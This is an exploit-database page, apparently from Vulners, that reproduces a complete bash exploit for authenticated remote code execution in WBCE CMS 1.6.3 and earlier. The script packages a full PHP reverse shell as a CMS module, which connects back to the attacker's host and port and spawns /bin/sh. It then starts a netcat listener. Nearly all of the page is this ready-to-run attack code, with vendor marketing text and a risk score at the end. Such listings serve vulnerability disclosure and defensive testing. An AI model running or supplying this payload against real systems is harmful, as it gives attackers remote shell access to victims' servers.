Vulners
Lucene search
WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)
# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
# Date: 3/22/2025
# Exploit Author: Swammers8
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS
# Version: 1.6.3 and prior
# Tested on: Ubuntu 24.04.2 LTS
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE
#!/bin/bash
# Make a zip file exploit
# Start netcat listener
if [[ $# -ne 2 ]]; then
echo "[*] Description:"
echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
echo "[*] It will create an infected module .zip file and start a netcat listener."
echo "[*] Once the zip is created, you will have to login to the admin page"
echo "[*] to upload and install the module, which will immediately run the shell"
echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
echo "[!] Usage:"
echo "[*] $0 <lhost> <lport>"
exit 1
fi
if [ -z "$(which nc)" ]; then
echo "[!] Netcat is not installed."
exit 1
fi
ip=$1
port=$2
rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule
echo [*] Crafting Payload
cat <<EOF > shellModule/info.php
<?php
/**
*
* @category modules
* @package Reverse Shell
* @author Swammers8
* @link https://swammers8.github.io/
* @license http://www.gnu.org/licenses/gpl.html
* @platform example.com
* @requirements PHP 5.6 and higher
* @version 1.3.3.7
* @lastmodified May 22 2025
*
*
*/
\$module_directory = 'modshell';
\$module_name = 'Reverse Shell';
\$module_function = 'page';
\$module_version = '1.3.3.7';
\$module_platform = '2.10.x';
\$module_author = 'Swammers8';
\$module_license = 'GNU General Public License';
\$module_description = 'This module is a backdoor';
?>
EOF
cat <<EOF > shellModule/install.php
<?php
set_time_limit (0);
\$VERSION = "1.0";
\$ip = '$ip'; // CHANGE THIS
\$port = $port; // CHANGE THIS
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;
if (function_exists('pcntl_fork')) {
\$pid = pcntl_fork();
if (\$pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if (\$pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
\$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
printit("\$errstr (\$errno)");
exit(1);
}
\$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
\$process = proc_open(\$shell, \$descriptorspec, \$pipes);
if (!is_resource(\$process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);
printit("Successfully opened reverse shell to \$ip:\$port");
while (1) {
if (feof(\$sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof(\$pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);
if (in_array(\$sock, \$read_a)) {
if (\$debug) printit("SOCK READ");
\$input = fread(\$sock, \$chunk_size);
if (\$debug) printit("SOCK: \$input");
fwrite(\$pipes[0], \$input);
}
if (in_array(\$pipes[1], \$read_a)) {
if (\$debug) printit("STDOUT READ");
\$input = fread(\$pipes[1], \$chunk_size);
if (\$debug) printit("STDOUT: \$input");
fwrite(\$sock, \$input);
}
if (in_array(\$pipes[2], \$read_a)) {
if (\$debug) printit("STDERR READ");
\$input = fread(\$pipes[2], \$chunk_size);
if (\$debug) printit("STDERR: \$input");
fwrite(\$sock, \$input);
}
}
fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);
function printit (\$string) {
if (!\$daemon) {
print "\$string\n";
}
}
?>
EOF
echo [*] Zipping to shellModule.zip
zip -r shellModule.zip shellModule
rm -rf shellModule
echo [*] Please login to the WBCE admin panel to upload and install the module
echo [*] Starting listener
nc -lvnp $port
echo
echo
echo "[*] Done!"
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Apr 2025 00:00Current
7.4High risk
Vulners AI Score7.4